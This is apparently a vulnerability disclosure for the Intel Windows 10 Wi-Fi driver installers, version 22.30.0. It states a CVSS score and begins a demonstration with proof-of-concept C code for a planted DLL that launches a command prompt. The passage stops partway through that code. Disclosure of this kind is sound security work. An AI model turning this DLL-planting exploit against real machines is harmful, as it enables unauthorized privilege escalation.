Windows 10 Wi-Fi Drivers For Intel Wireless Adapters 22.30.0 Privilege Escalation

Windows 10 Wi-Fi Drivers For Intel Wireless Adapters version 22.30.0 suffer from a privilege escalation vulnerability.

MD5 | fddef28176fdfc853cd80a06bd172376

Download

Hi @ll,

the executable installers version 22.30.0 (Latest), published 2/23/2021,
for the "Windows® 10 Wi-Fi Drivers for Intel® Wireless Adapters",
<https://downloadmirror.intel.com/30208/a08/WiFi_22.30.0_Driver32_Win10.exe>
and
<https://downloadmirror.intel.com/30208/a08/WiFi_22.30.0_Driver64_Win10.exe>,
available from
<https://downloadcenter.intel.com/download/30208/Windows-10-Wi-Fi-Drivers-for-Intel-Wireless-Adapters>
are (SURPRISE!) vulnerable: they allow arbitrary code execution WITH
local escalation of privilege.


CVSS 3.0 score: 8.2 (High)
CVSS 3.0 vector: 3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H


Demonstration:
~~~~~~~~~~~~~~

0. Log on with an arbitrary user account.

1. Save the following source as poc.c in an arbitrary directory:

--- poc.c ---
// Copyright (C) 2004-2021, Stefan Kanthak <[email protected]>

#define STRICT
#define UNICODE
#define WIN32_LEAN_AND_MEAN

#include <windows.h>

const STARTUPINFO si = {sizeof(si)};

__declspec(safebuffers)
BOOL WINAPI _DllMainCRTStartup(HANDLE  hModule,
                               DWORD   dwReason,
                               CONTEXT *lpContext)
{
    WCHAR szCmdLine[] = L"CMD.exe /D /K WHOAMI.exe /ALL";

    PROCESS_INFORMATION pi;
#if 0
    if (dwReason != DLL_PROCESS_ATTACH)
        return FALSE;